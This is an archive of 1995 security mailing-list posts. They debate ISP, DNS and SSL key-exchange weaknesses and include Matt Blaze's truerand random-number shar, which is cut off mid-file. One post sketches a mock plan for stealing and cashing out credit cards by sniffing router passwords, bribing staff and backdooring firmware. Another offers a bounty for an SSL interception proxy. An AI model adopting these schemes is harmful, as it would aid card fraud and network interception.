MIME-Version: 1.0
Content-Type: text/plain


| From jbass Mon Sep 25 15:00:41 1995
| To: JohnCGreen@aol.com
| Subject: Re:  Netscape bug, RSA patent, hacker challenge
| Cc: rmiug-discuss@rmiug.org, isig@netf.org
| 
| On Thu, 21 Sep 1995 JohnCGreen@aol.com wrote:
| > Internet commerce is getting off to a slow start. One of the reasons is
| > nervousness on the part of the general public regarding the use of insecure
| > networks. I believe it is not in the industry's interest to have vendors
| > publicly pointing out flaws in competitors' products.
| [ ... part deleted ...]
| > I believe that as long as industry experts working for huge companies like
| > Sun and AT&T as well as executives of small companies like NetManage and
| > Community ConneXion continue to criticize publicly the security of
| > competitors' systems commerce will be very slow to develop.
| > - - -
| > Internet Marketing and Business Development Consultant
| > 21483 Old Mine Rd             Tel: (408)353-1870
| > Los Gatos CA 95030           Internet: JohnCGreen@aol.com
| 
| Most of us are employed directly or indirectly by somebody. The quotes
| involved were not derived from text under a press release letterhead
| by the employers of those involved.  The press is certainly free to use
| the persons educational and employment credentials in citing the source.
| Your objections here are with out merit, since the quotes were not
| officially released by the businesses involved and only serve to distract
| from the real problems.
| 
| Internet commerce is getting off to a slow start for good reason. Encryption
| or not, using the internet in it's current state for commerce is fundementally
| insecure, and the commercial internet providers have failed to address the
| primary problems. During a security discussion in the Colorado SuperNet
| users group mailing list last spring Brad Huntting, one of CSN's lead
| techinical specialists, made this remarkably clear in his posting on
| 13 Mar 1995 23:55:46 in response to my posting regarding minimal security
| expectations to do business on/over the internet.
| 
| A clear line of attack for any site dealing with credit cards or other
| valuable data would be to attack the authoritative name servers (and routes
| to/thru DNS servers) to reroute the target hosts traffic thru a filter host
| to skim off data transparently. Or more directly to watch /dev/nit somewhere
| on the network where www clients or servers are active with this data.
| 
| I am hardly an internet security expert, but also far from being a newbie
| at this game. I often have a more fundamental perspective on these problems,
| and in some cases very different levels of expectations. We are dealing with
| areas where there is no single right and wrong way to solve the security
| problem. But there are clearly certain technical flaws that MUST be addressed
| FIRST, before any solution will be viable.
| 
| [from my Mon, 13 Mar 95 21:43:46 -0700 posting to ug@csn.net]
| 
| I start with 4 expectations about providers which are seldom met:
| 
| 	1) ISP's manage internal and external back bones in a secure mode.
| 	   This means that nobody except critical internal staff can snoop
| 	   customer traffic or program routers - by network design.
| 
| 	2) ISP's manage the bridge/routers and subnets for network customers
| 	   (dedicated/slip/ppp) with advertised routes/domains/MX service
| 	   as secure too.
| 
| 	3) They firewall the billing systems, key servers, and monitor
| 	   the security for them very carefully.
| 
| 	4) They have a relatively insecure interactive environment on it's own
| 	   subnet behind a bridge/router/etherswitch to issolate it from the
| 	   internal backbone.
| 
| The CSN/Brad Huntting response was:
| 
| >I dont believe any ISP's do this. "As secure"?  This [...] is fantasy.
| 
| With this model we can make some assertions (not necessaryly true today):
| 
| 	A) Customer data between two full-time (#2 above) subscribers (of
| 	   atleast the same provider, and reasonably expected between major
| 	   providers) *SHOULD* be expected to be secure *AND* that they devote
| 	   the resources to insure that it remains secure. Without this
| 	   everyone using the internet to transact business is highly at risk.
| 
| 	B) Mail service between two full-time (#2 above) subscribers (of
| 	   atleast the same provider, and reasonably expected between major
| 	   providers) *SHOULD* be expected to be secure. This is clearly not
| 	   true today since some providers use interactive customer systems
| 	   for mail servers - so fall back delivery via MX records drop mail
| 	   into an insecure environment.
| 
| The CSN/Brad Huntting response was:
| 
| > E-Mail?  Secure?  You are high...
| 
| It's no wonder an increasing number of companies are all but disconnecting
| from the internet.
| 
| The interactive systems at providers sites are completely a different cow/pig
| ...  they are difficult to class as anything but unsecure/hostile since the
| user base has *NO* controls. Anybody that pays their startup fees can get an
| account and hack/crack for atleast a month. Running www, other clients or
| servers which transact business in this environment is fundementally insecure.
| Because of this, the home computer model over slip/ppp should be the only or
| prefered way to do internet business.
| 
| Any rational provider needs to firewall their "support" systems (routers,
| billing systems, and key servers) from this interactive zoo, slip/ppp/dedicated
| customers, and the rest of the internet. The Kevin Mitnick attack was pure
| stupidity ... he left a trail to his apartment. The providers involved didn't
| do enough to firewall their support systems. Dozens/hundreds of other hackers
| and crackers are atleast smart enough to loop their telnet/rlogins thru foreign
| sites that *WILL NOT* provide call/route trace data to the Feds and then loop
| the service such that packet correlation within a provider can not be done.
| Had Mitnick done this he would still be reaping havoc. Other probably are
| still at it, untraceable.
| 
| I have several friends that have been running mail order businesses via
| WEB servers ... you can order audio CD's, Video's, software, Adult toys,
| and other interesting things from them. They are also cracker targets since
| they do business via credit cards from their systems. Unless somebody can
| start making the core part of the network secure and drive the cracker
| havens from the net, I would not be suprised if the credit card companies
| start withdrawing authorization from these businesses. Some of the non-credit
| card companies, like Pizza Hut will also get tired of the internet when
| some SOB floods them with prank orders day in and day out ...
| 
| Current "secure protocols" are hardly secure in an insecure environment, they
| require atleast a certain trusted agent/transport domain to work.  If we are
| going to "cleanup the net", it is going to be with providers and users taking
| responsiblity for securing the primary backbones and provider resources, then
| removing the hostile users and havens from the net.
| 
| Having safe-havens on the net where hackers from around the world can safely
| telnet thru has to stop ... before business on the internet is practical.
| Getting the ISP's to accept basic route/data security as part of their service
| offering is manditory for any sucessful encryption scheme. NetScape's current
| problems are just the tip of the iceberg.
| 
| -----------
| John Bass
| UNIX Consultant                     Development, Porting, Performance by Design
| 
| 
| From jbass Mon Sep 25 16:48:29 1995
| To: isig@netf.org, rmiug-discuss@rmiug.org
| Subject: encryption in an insecure environment
| Status: O
| 
| Since several Public Key and PGP supporters don't understand the basics
| of their own offerings ... I'll provide the rebuttal publicly for the
| rest of you who may have been confused by my last posting.
| 
| Encryption security is only as good as the security of the "key(s)" involved.
| How keys are transmitted is the weak link for network based encryption
| security systems.
| 
| First Public Key encryption is far better than "pretty good" as long as
| you know the sending party *IS* using *YOUR* key. The problem is that
| when one or more messengers are in the loop, they can keep the receipents
| key and provide the sender with their own key. When they get the senders
| message they can decode the text, then re-encode it with the key obtained
| from the receipent before passing it along to the receipent.
| 
| Using Public Key encryption over the internet therefore requires that the
| messengers (ISP's and the commerical internet backbones) are trustworthy
| in delivering keys and limiting data access. If any point in the network
| allows a hacker to substitute keys and reencrypt messages, then communication
| between the customer and vendor is insecure. Routers, bridges, and Domain
| Name Servers become key targets and must be trusted and secure. This is not
| true today.
| 
| John Bass
| UNIX Consultant                     Development, Porting, Performance by Design
| 
| From jbass Tue Sep 26 20:46:01 1995
| To: rmiug-discuss@rmiug.org, isig@netf.org
| Subject: DNS role in an insecure network environment
| Status: O
| 
| Since some folks here may not understand why Domain Name Servers
| and the routes to/from them must be secure I'll provide a short
| description of why attacking them, or their routing, can be used
| to attack a vendors server system.
| 
| Domain Name Service (DNS) has several critical roles in regard
| to supporting internet security. This opens the door for several
| interesting attacks.
| 
| It is critical that the mapping of host.domain a client system results
| in the internet address of the server host requested - and not that of
| some substituted server intercepting traffic for it.
| 
| If an attacker can convince a client system to resolve requests for
| server.vendor.domain to the substituted server, then the attacker can
| forward the clients requests to the real server while skimming the
| data involved. There are several ways to do this ranging from directly
| attacking the DNS system to injecting subsituted DNS replys into the
| network. Doing this on an ISP's interactive system simply requires
| gaining enough privilege to either edit/replace host name tables or
| forcing an entry into the network kernel cache. Since DNS entries are
| cached, the substituted server address can have a fairly long life. The
| substituted server can be any machine in the world ... either in a safe
| haven zone or another compromised site to protect the hackers identity.
| 
| Authentication often requires that given some client/server address
| that you can trust DNS services to map it to the correct host.domain
| name which is then compared with an access control list.  Many network
| servers can be attacked by subsituting a trusted sites name given the
| attackers address.
| 
| The reliance on DNS creates a house of cards out of internet security,
| particulary since the ISP's internal network and internet backbone
| is managed without explict attention to data/routing/DNS security. The
| ISP's seem think it's the users problem ... without any viable solution.
| 
| John
| 
| From jbass Thu Sep 28 08:14:26 1995
| To: Steve Hultquist <ssh@rmii.com>
| Subject: Re: DNS role in an insecure network environment
| Cc: rmiug-discuss@rmiug.org, isig@netf.org
| Status: O
| 
| Steve,
| 
| Let's recap this in brief. In the first three postings I formed a strong
| argument that a collection of technologies in current use and percieved
| as secure, have in fact several lines of attack related to the messenger
| problem of distributing public keys. Nobody has offered a rebuttal to
| this method of attack showing the assertions invalid.
| 
| This assertion directly implies that current practice of using Public
| Key encryption with inband keys is flawed, independent of the merits
| of the encryption algorithm, key algorithm or key length.
| 
| Independent of the merits of any encryption or authentication algorithm,
| accepted solutions to the the messenger attack require the existance of
| either an out-of-band key or a secure communications channel. How secure
| the channel must be depends on several factors. At minimum it must have
| routing integrity, which is not currently the case, to prevent a third
| party from inserting a filter (messenger) into the data path. Preferably
| the data path would not be clear text at all.
| 
| There are millions of customers and a large number of vendors accepting
| the current technology without the knowledge of it's flaws.
| 
| You jump in with two postings which attempt to discredit my assertions
| purely with the force of your reputation saying it ain't so, and offer
| your signature lines as proof. And then get highly personal and offended
| when I question your weak attack.
| 
| There are solutions to the problem, but they are not in widespread use
| on the internet to protect WWW commerce. CrypoCards are neat, but they
| are not the solution for the WWW. Third party systems still have the
| messenger problem unless an out-of-band key exists or the communication
| channel is secure to start with.
| 
| My business cards just say "consultant" ... I also have a few left that
| say "janitor" (for cleaning up other engineers messes, and empting the
| trash after my employees). I also have a few that simply say "owner",
| but I have never thought it quite right to run my 1-10 man shop with
| the title president, CEO, or whatever titles that are used by those
| with the real resposibility for running multi-million/billion dollar
| companies with hundreds/thousangds of peoples jobs/lives at stake.
| 
| 
| You say:
| 
| 	I think the technology is well-understood and has to do with
| 	key escrow by trusted servers.
| 
| and I say fine, but that doesn't help today's customers. The messenger
| problem still exists with dynamic in-band registration, an out-of-band
| key is still needed..
| 	
| 	Yes, it takes a little time to set up third-party
| 	key servers, but it's not *that* difficult.  And, fortunately, it has
| 	nothing to do with major changes to things as fundamental as DNS.
| 
| and I say fine, but that doesn't help today's customers. Nor did I advocate
| changes to DNS ... just cleaning up the security of the channels it operates
| over.
| 	
| 	I don't think [out-of-band] key management is that difficult.
| 
| I don't think it is either, *IF* done by the ISP for the ISP's protection
| domain *AND* the ISP's implement and extended protection domain to cover
| the backbone and all ISP's. But's that's not here today either
| 	
| 	Are you familiar with the current IETF working groups?  Would you
| 	like to provide us with an assessment of the various approaches, including
| 	IPv6 (which, by the way, we are demonstrating here at Networld+Interop this
| 	week: http://www.interop.net)?
| 
| As I stated in my original post I don't claim to be an internet security expert.
| You do.
| 
| The real point is that none of this protects todays customers and vendors.
| I am not going to beat my chest and hope some group can change the risks
| for www customers in the next year either. (But it would be nice)
| 	
| 	>Since current systems depend on messengers, they are flawed from
| 	>a security standpoint no matter how many million may be in use.
| 	>The NetScape encryption that was just broken what widely in use
| 	>and success by your definition ... by mine it was a failure due
| 	>to it's flaws ... exploited or not.
| 	
| 	Hogwash.  Netscape was broken because they screwed up their randomization
| 	routine.  It has nothing to do with the inherent security of the design,
| 	other than the flawed randomization.  These are the rumors I was talking about.
| 
| (grin) then prove it. Disprove the messenger attack. This is not a complex
| theory or algorithm we are talking about. The thousand or so readers of
| these lists will sleep a lot better if you can.
| 	
| 	>And there in lies the cruz of the problem, trusting people with your title
| 	>for security who claim to be experts, yet just stick their head in the sand ...
| 	
| 	You know, John, you are one of the most caustic people I have ever conversed
| 	with.  You don't know me, other than our e-mail conversations, yet you
| 	continue to denigrate me in public.  I won't talk about my background,
| 	except to say that none of my security implementations have been
| 	compromised, my clients recommend me to others, and I am well aware of those
| 	times I need to enlist other experts.
| 	
| 	Unlike you, John, I'm not perfect, and can use the assistance of others at
| 	times.
| 
| Gee ... for somebody that doesn't know me either you bring a lot of personel
| stabs into this. "stick their head in the sand" is pretty meek compared to
| your full on attack.
| 	
| 	>please explain to the rest of how your CryptoCard can be used
| 	>to solve the problem for the rest of us that would like to wander
| 	>the Web and shop without physically registering our card
| 	>with each store.
| 	
| 	You'd only need to register it with a key server.  But, you won't be
| 	convinced, will you, John?
| 
| and serveral million readers installed on every PC, and several million more cards
| with unique ID's manufactured and distributed to users world wide, and the
| coding whould have to have a trap door for the NSA and law enforcement which
| would soon become widely known by all cyber crooks and econo terrorists.
| (or copies of the servers database should some employee decide that a new
| name and foreign home and retirement plan was worth the price of walking out
| the front door with some extra in their pocket) Not every problem has
| a technical solution ... not even for technical secrets.
| 	
| 	>dream on and sleep well ...
| 	
| 	I sleep well almost every night.  And so do my clients.
| 	
| 	It makes me wonder about yours.  If you have any.
| 	
| cheap shot ... sleep on. (but I wonder about your ...)
| 
| 	Cheers,
| 	ssh
| 	--
| 	Steve Hultquist                   Distributed Systems and Internet Engineering
| 	President, Worldwide Solutions, Inc.                         Boulder, Colorado
| 
| John Bass
| Janitor, DMS Design		;-))
| 
| From jbass Fri Sep 29 01:28:26 1995
| To: isig@netf.org, rmiug-discuss@rmiug.org
| Subject: How to get rich from this ...
| Status: R
| 
| 
| Security flaws for the most part are just fun toys. With WWW & credit cards
| we can really let our fingers to the walking. Thru the internet backbone
| travels thousands of credit cards with authorization data every day/hour/minute.
| Or you can be a little more selective and pick a state, city, or smaller
| geograhical area by choosing which pipe to plug into.
| 
| Where good old phone banks with people and the net differ - is a single
| electronicly readable pipe of treasure outside the normal EFT security
| channels. This centralization of data is what makes it attractive *IF*
| you find a way to turn it into cash without getting caught or the risk of
| getting caught can be out wieghed by the gains.
| 
| How much can 5,000 credit cards be worth ... 1,000-3,000 each to the tune
| of say 10 million if you are thinking small. On a little bit more grand
| scale 10X or 100X is possible with some planning on how to get the money
| into a usable place. We are talking more money than can be obtained from
| even the biggest of bank or collectable roberies. I think that makes it
| a goal of atleast somebody out there ... if not an unknown cyber crook,
| organized crime, revolutionaries, some third world government.
| 
| Some planning is in order - how to plug into the pipe, how to get the
| money out. This is the fun part ;-)
| 
| We could probably afford to give say $50K to some college kid working for
| the regional ISP to find out a router passwd or two and share them with us.
| Maybe we are a little more discrete and simply put in a job application with
| them for the summer, or we by a few dozen very expensive routers and sell
| them cheap after installing a trap door in their firmware. Maybe we just
| do it the old fashion way and crack the root passwd on the interactive server
| and leave a background process watching /dev/nit for router passwds around
| the time we know they are going to do some reconfiguration.
| 
| Getting the money out is the real creative part.  Certainly running down
| and taking out cash advances is out of the question - or at least boring.
| We could do it the simple way - for each card in a targeted city, binary
| search it's limit by ordering various non-traceable comodities like Pentium
| CPU's, memory, jewlry, gold/silver coins for the card owners shipped to
| their homes - then hijack the FedX and UPS regional delivery trucks first
| thing in the morning. Since the goods are prepaid, it will probably take
| several days before they can figure out the magnitude of the deal. Probably
| time to do it a couple more times. Certainly doing say 50 at the same time
| could yield a diversified retirement income.
| 
| With out the glamour is more tried and true ways - hire a few hundred
| college kids to start a chain of computer software stores. Build volume
| by selling exactly at operating costs - undercutting everybody. When the
| bank gets used to the credit card rate, hold a few loss leader sales to
| create some greate peaks ... then dump the entire stolen credit card list
| spread out against all the stores over a week period - slamming the cash
| into places difficult to find and run like heck. With luck you may be able
| to shield your identity and be faceless after the fallout.
| 
| Take a large portion of the earnings to the track, powerball offices,
| and your local bookie ... REALLY HIDE the rest. If you get caught nobody
| will have the foggiest idea of how much is in your retirement fund
| after writing a best selling crime series in the slammer. Hopefully
| they will allow notebook computers and ISDN lines in cells by then.
| 
| Find your body double and do everything in their name and town -- that's
| FYI on the SLY of course ....
| 
| Unlike others, I have a strong dislike for centralized key databases, they
| make too big a target for traditional sorts of penitration - the data is
| worth thousands times more than you are likely to pay for it under the table.
| 
| I am a strong supporter of Public Key for both private and commerical data
| protection ... but you must be fully aware to protect the initial key. As
| used by most applications, the messenger attack is possible.
| 
| have fun, hope you enjoyed this series.
| 
| The Janitor :)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbass@dmsd.com (John L. Bass)
Date: Sat, 30 Sep 95 12:10:47 PDT
To: rmiug-discuss@rmiug.org
Subject: NetScape's dependence upon RSA down for the count!
Message-ID: <9509301910.AA10970@dmsd.com>
MIME-Version: 1.0
Content-Type: text/plain


Well guys and gals ...

I spent some time reading documentation on the www servers for NetScape
and Community ConneXion (c2.org).

The "messenger attack" as described in my earlier posts regarding
public key encryption and key management seems to apply to NetScape's SSL.
I have a Fifty dollar bill for the first person to submit to the mail box
nethack@dmsd.com a working Unix server (with cleartext session logs) which
accepts all connections on a unix based host to the www port and redirects
them to netscape.com leaving a clear text log of each session's SSL packets
in /tmp by session.  All entries become the property of DMS Design. The winner
and I will submit a claim for one of Community COnneXion's "I HACKED NETSCAPE"
tee shirts as a server hack. (Have Fun!!)

After a careful examination of NetScapes public documentation it appears
that SSL which is based upon RSA's public key technology may be down for the
count. The fall of SSL would doom NetScapes current claim of "Strong exhortable
cryptography for credit card-based financial transactions" as outlined
in Taher Elgamal's (NetScape's Chief Scientist) white paper titled
"COMMERCE ON THE INTERNET: CREDIT CARD PAYMENT APPLICATIONS OVER THE INTERNET"
Version 1.00 dated July 14, 1995 which can be found on the www as
http://home.netscape.com/newsref/std/credit.html. SSL doc can be found as
http://home.netscape.com/newsref/std/SSL.html.

John L. Bass
Owner, DMS Design





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbass@dmsd.com (John L. Bass)
Date: Sat, 30 Sep 95 12:26:04 PDT
To: rmiug-discuss@rmiug.org
Subject: Re: NetScape's dependence upon RSA down for the count!
Message-ID: <9509301925.AA11020@dmsd.com>
MIME-Version: 1.0
Content-Type: text/plain



In case SSL packets are not available from NetScape homepage server,
use the netscape server of your choice in the contest ...

have fun,
John





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbass@dmsd.com (John L. Bass)
Date: Sat, 30 Sep 95 12:39:36 PDT
To: rmiug-discuss@rmiug.org
Subject: Re: NetScape's dependence upon RSA down for the count!
Message-ID: <9509301940.AA11065@dmsd.com>
MIME-Version: 1.0
Content-Type: text/plain



and yes I'll accept server hacks which run's on linux and bsd too :)
John





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 30 Sep 95 12:11:37 PDT
To: cypherpunks@toad.com
Subject: Re: COE Document
Message-ID: <199509301909.PAA11718@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <n1399743612.14225@epic.org>, banisar@epic.org ("Dave Banisar")
wrote:

Here are some thoughts.

[...]

>                        Recommendation No. R (95) 13

> Recommendations No. R (87) 15
> regulating the use of personal data in the police state and
> Recommendations No. R (89) 9 on computer-relating crime,

The countries of the EC are police states and admit to it in an official
doccument.

[...]

> 3. During execution of a search, investigating authorities should have the
> power, subject to appropriate safeguards, to extend the search of other
> computer systems within their jurisdiction which are connected by menas of
> a network and seize the data therein, provided immediate action is
> required.

If the computer to be searched is connected to the Internet, any other
computer connected to the Internet and located in the same country may be
searched as well without requiring a second warrant.

> 12. Specific obligations should be imposed on service providers who offer
> telecommunications services to the public, either through public or
> private networks, to provide information to identify the user, when so
> ordered by the compentant investigating authority.

Remailers will be outlawed.

[...]

> V. Use of Encryption 
> ---------------------
> 
> 14. Measures should be considered to minimise the negative effects of the
> use of cryptography on the investigation of criminal offenses, without
> affecting its legitimate use more than is strictly necessary.
GAK is comming.

The new world order is unmasked: a gobal police state. Folks, it is time
to buy some rifles and lots of ammunition. Oh, I forgot, over there in
Europe you can no longer buy any. Seems the political leaders have thought
ahead.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMG2V5SoZzwIn1bdtAQG5qQF/R3iX89TlU3rRD6NeIIVMG2F7iF6SNpME
6MjNUABjfCmGRwl6llCAC/bDtc2zxndA
=pXsk
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gmixo@alpha.c2.org (gmixo)
Date: Sat, 30 Sep 95 15:28:31 PDT
To: cypherpunks@toad.com
Subject: Auto-signing
Message-ID: <199509302209.PAA03217@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


would someone please send me information about any autosigning services.... like the gratis auto-signing.... and others like it.... thanks

gmixo





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Sat, 30 Sep 95 12:41:47 PDT
To: List <cypherpunks@toad.com>
Subject: The 4th Estate
Message-ID: <Pine.OSF.3.91.950930151927.23796B-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain



	I am a freelance journalist who has been 'lurking' on your list
for about six months now. I have a great interest in cryptography and the
mathematics behind cyphers. I write a weekly column about computers and
the Internet in a small town newspaper in Brantford Ontario. I was
particularly interested in the SSL crack that took place recently and I
wrote an article about the feat and talked about some of the implications
of this use of the Internet. 
	In previous articles I have spoken about the need for widespread,
strong, cryptography to both protect personal privacy and to aid secure
business communications. I have been following the debate about a 
Cypherpunk spokesperson with some interest and I thought that I would 
throw in my two cents worth (2.5 cents Canadian! :-})
	It is always difficult to get a group of strong individualists 
to agree to a common cause or to allow one person to become a spokesman 
for the group. Such a position grants a certain amount of 'power', for 
lack of a better word, to such a person. I think that there is no need 
for such a person. Each of us has a different point of view that, while 
sharing some common ideas, cannot be reconciled with any 'official' position.
	I think that the accomplishments of the group speak volumes and 
have no fear, the public is listening. I do, however, detect some small 
amount of smugness attached to comments about 'Joe Sixpack'. While it is 
true that the average citizen is not interested in esoteric subjects such 
as cryptography, do not underestimate the importance of communicating 
with them. Their votes and elected representatives will control the 
future legislation regarding cryptography. It is vital that they 
understand just what is at stake in this debate, and that they make 
decisions based upon knowledge and not upon fear.
	Therefore, it is important that we ALL do our share of 
communicating with the press and the public. Without our input, the 
scaremongerers will carry the day.
	In the meantime, keep up the good work. If anyone wants copies of 
the articles that appeared in the paper, E-mail me and I will send them. 
If there is enough demand I will post them to the list. Don't worry, 
they are only about 700 words each.

Regards, 

Tim Philp
Brantford, Ontario
Canada

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAy/KL1MAAAEEALIrcJLNr3LTauphCzkU1SNtZkUPCEH14xIxVaiSM/7850/y
6qkA17N0/4E20RiyQIZ7TZf2vpbaTHs88+jU4Lvb/fBWBnL1AZBdW7I1+vNSMGzG
ljBzU9X+BXrBFYi4CzpWhqOo+a2IQaJx4sZ7w/GG59gdFIyps3seeMISF+fVAAUR
tCBUaW0gUGhpbHAgPGJwbGliQG5pYy5ob29rdXAubmV0Pg==
=6Rrp
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Sat, 30 Sep 95 12:35:48 PDT
To: cypherpunks@toad.com
Subject: my favorite random-numbers-in-software package (unix)
Message-ID: <199509301946.PAA15565@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


About a week ago I posted my (Don Mitchell's really) truerand() routine
for Unix.  truerand() needs some post-processing before use; it cannot
be used directly.  Here's a more complete version; the main interface is
randbyte(), which returns (in about a third of a second) one really
random byte (based on 64 truerand() bits) that can be used directly.
As an added bonus, the library also throws in a shs-2 function and the
basic truerand() code.

The basic idea is that you exploit randomness in the drift between
the processor clock and the rate at which interval timer interrupts
occur.  Such drift occurs even on idle processors.  randbyte() assumes
that there's at least about .4 bits of "entropy" per interrupt, which is 
(probably) a safe assumption on modern processors.  Randomness introduced
by the OS (scheduler, etc.) can add to the overall entropy, but shouldn't
be relied upon by itself.

An advantage to this approach (using clock skew) is that the randomness
doesn't depend on external events like user input, network traffic or
processor load.  That makes it especially attractive for generating keys
on unattended servers, e.g., for generating Diffie-Hellman exponents.
Note, however, that very (very) slow and heavily-loaded processors may
not provide enough cycles to the truerand process between interrupts for
these assumptions to hold.  Also, all bets are off on processors that use
a single clock source for both interval timing and CPU clocking.

This code is very BSD/SunOS-centric and is completely untested elsewhere.

Read the comments for scary warnings about testing on your own platform
before using it for anything serious like generating keys.

-matt

=======================cut here==============
#!/bin/sh
# This is a shell archive (produced by GNU sharutils 4.1).
# To extract the files from this archive, save it to some FILE, remove
# everything before the `!/bin/sh' line above, then type `sh FILE'.
#
# Existing files will *not* be overwritten unless `-c' is specified.
#
# This shar contains:
# length mode       name
# ------ ---------- ------------------------------------------
#   1270 -rw-r--r-- makefile
#   1246 -rw-r--r-- randbyte.c
#   2886 -rw-r--r-- truerand.c
#   7142 -rw-r--r-- shs.c
#    149 -rw-r--r-- randtest.c
#
touch -am 1231235999 $$.touch >/dev/null 2>&1
if test ! -f 1231235999 && test -f $$.touch; then
  shar_touch=touch
else
  shar_touch=:
  echo
  echo 'WARNING: not restoring timestamps.  Consider getting and'
  echo "installing GNU \`touch', distributed in GNU File Utilities..."
  echo
fi
rm -f 1231235999 $$.touch
#
# ============= makefile ==============
if test -f 'makefile' && test X"$1" != X"-c"; then
  echo 'x - skipping makefile (file already exists)'
else
  echo 'x - extracting makefile (text)'
  sed 's/^X//' << 'SHAR_EOF' > 'makefile' &&
# makefile for librand
# tested on Sparc-20 (SunOS 4.x) and P100 (BSDI) only.
# You're on your own elsewhere.  Read the comments for scary warnings.
#
# Usage: int randbyte();
#
#* The authors of this software are Don Mitchell, Matt Blaze & Jack Lacy.
#*              Copyright (c) 1995 by AT&T.
#* Permission to use, copy, and modify this software without fee
#* is hereby granted, provided that this entire notice is included in
#* all copies of any software which is or includes a copy or
#* modification of this software and in all copies of the supporting
#* documentation for such software.
#*
#* This software may be subject to United States export controls.
#*
#* THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED
#* WARRANTY.  IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY
#* REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY
X
SRCS=randbyte.c truerand.c shs.c
OBJS=randbyte.o truerand.o shs.o
CC=gcc
CFLAGS=
# No -O in CFLAGS! On some compilers, this optimizes out the counter...
X
librand.a: $(OBJS)
X	ar rcv librand.a $(OBJS)
X	ranlib librand.a
X
randtest: randtest.c $(SRCS)
X	cc -DDEBUGRND randtest.c $(SRCS) -o randtest
X
librand.shar: makefile $(SRCS) randtest.c
X	shar makefile $(SRCS) randtest.c > librand.shar
SHAR_EOF
  $shar_touch -am 0930150995 'makefile' &&
  chmod 0644 'makefile' ||
  echo 'restore of makefile failed'
  shar_count="`wc -c < 'makefile'`"
  test 1270 -eq "$shar_count" ||
    echo "makefile: original size 1270, current size $shar_count"
fi
# ============= randbyte.c ==============
if test -f 'randbyte.c' && test X"$1" != X"-c"; then
  echo 'x - skipping randbyte.c (file already exists)'
else
  echo 'x - extracting randbyte.c (text)'
  sed 's/^X//' << 'SHAR_EOF' > 'randbyte.c' &&
/*
X *	Random byte interface to truerand()
X *	Matt Blaze 5/95
X *	eight really random bits
X *	usage: 
X *		unsigned char r; int randbyte();
X *		r=randbyte();
X *	randbyte() takes about .3 seconds on most machines.
X */
/*
X * The author of this software is Matt Blaze.
X *              Copyright (c) 1995 by AT&T.
X * Permission to use, copy, and modify this software without fee
X * is hereby granted, provided that this entire notice is included in
X * all copies of any software which is or includes a copy or
X * modification of this software and in all copies of the supporting
X * documentation for such software.
X *
X * This software may be subject to United States export controls.
X *
X * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED
X * WARRANTY.  IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY
X * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY
X * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE.
X */
X
int randbyte()
{
X	unsigned long truerand();
X	unsigned char *shs();
X	unsigned long r[2];
X	unsigned char *hash;
X
X	r[0]=truerand(); r[1]=truerand();
X	hash = shs(r,sizeof(r));
#ifdef DEBUGRND
X	printf("%011o %011o %02x\n",r[0],r[1],*hash & 0xff);
#endif
X	return ((int) (*hash)) & 0xff;
}
SHAR_EOF
  $shar_touch -am 0930145795 'randbyte.c' &&
  chmod 0644 'randbyte.c' ||
  echo 'restore of randbyte.c failed'
  shar_count="`wc -c < 'randbyte.c'`"
  test 1246 -eq "$shar_count" ||
    echo "randbyte.c: original size 1246, current size $shar_count"
fi
# ============= truerand.c ==============
if test -f 'truerand.c' && test X"$1" != X"-c"; then
  echo 'x - skipping truerand.c (file already exists)'
else
  echo 'x - extracting truerand.c (text)'
  sed 's/^X//' << 'SHAR_EOF' > 'truerand.c' &&
/*
X *	Physically random numbers (very nearly uniform)
X *	D. P. Mitchell 
X *	Modified by Matt Blaze 2/95
X */
/*
X * The authors of this software are Don Mitchell and Matt Blaze.
X *              Copyright (c) 1995 by AT&T.
X * Permission to use, copy, and modify this software without fee
X * is hereby granted, provided that this entire notice is included in
X * all copies of any software which is or includes a copy or
X * modification of this software and in all copies of the supporting
X * documentation for such software.
X *
X * This software may be subject to United States export controls.
X *
X * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED
X * WARRANTY.  IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY
X * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY
X * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE.
X */
X
/*
X * WARNING: depending on the particular platform, truerand() output may
X * be biased or correlated.  In general, you can expect about 16 bits of
X * "pseudo-entropy" out of each 32 bit word returned by truerand(),
X * but it may not be uniformly diffused.  You should therefore run
X * the output through some post-whitening function (like MD5 or DES or
X * whatever) before using it to generate key material.  (RSAREF's
X * random package does this for you when you feed truerand() bits to the
X * seed input function.)
X *
X * Test these assumptions on your own platform before fielding a system
X * based on this software or these techniques.
X *
X * This software seems to work well (at 16 bits per truerand() call) on
